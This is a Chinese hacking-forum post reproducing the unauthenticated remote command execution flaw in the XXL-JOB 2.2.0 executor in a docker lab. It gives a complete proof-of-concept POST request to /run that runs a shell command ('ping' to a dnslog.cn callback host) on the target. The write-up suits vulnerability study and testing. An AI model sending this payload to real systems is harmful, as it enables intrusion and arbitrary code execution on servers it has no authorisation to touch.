联系我们联系我们
电子邮箱电子邮箱

XXL-JOB executor 未授权访问漏洞

[复制链接]
  • TA的每日心情

    2020-12-28 09:02
  • 签到天数: 8 天

    [LV.3]偶尔看看II

    上天 发表于 2021-1-7 10:22:56
    76 0
    # XXL-JOB executor 未授权访问漏洞

    XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

    ## 环境搭建
    执行如下命令启动2.2.0版本的XXL-JOB:

    docker-compose up -d
    搭建靶场.jpg
    环境启动后,访问`http://your-ip:8080`即可查看到管理端(admin),访问`http://your-ip:9999`可以查看到客户端(executor)。
    访问靶场.jpg

    ## 漏洞复现
    poc
    1. POST /run HTTP/1.1
    2. Host: 10.0.128.46:9999
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
    4. Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    6. Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
    7. Cache-Control: max-age=0
    8. Content-Length: 368

    9. { "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler", "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1586629003729, "glueType": "GLUE_SHELL", "glueSource": "ping 0r4t1y.dnslog.cn", "glueUpdatetime": 1586699003758, "broadcastIndex": 0, "broadcastTotal": 0 }
    复制代码
    成功
    复现.jpg

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    发表新帖

    小黑屋|手机版|Archiver|华盟论坛 ( 京ICP备11013304号-8 )

    Powered by 华盟网 X 8.0  © 2001-2013 Comsenz Inc.  华夏黑客同盟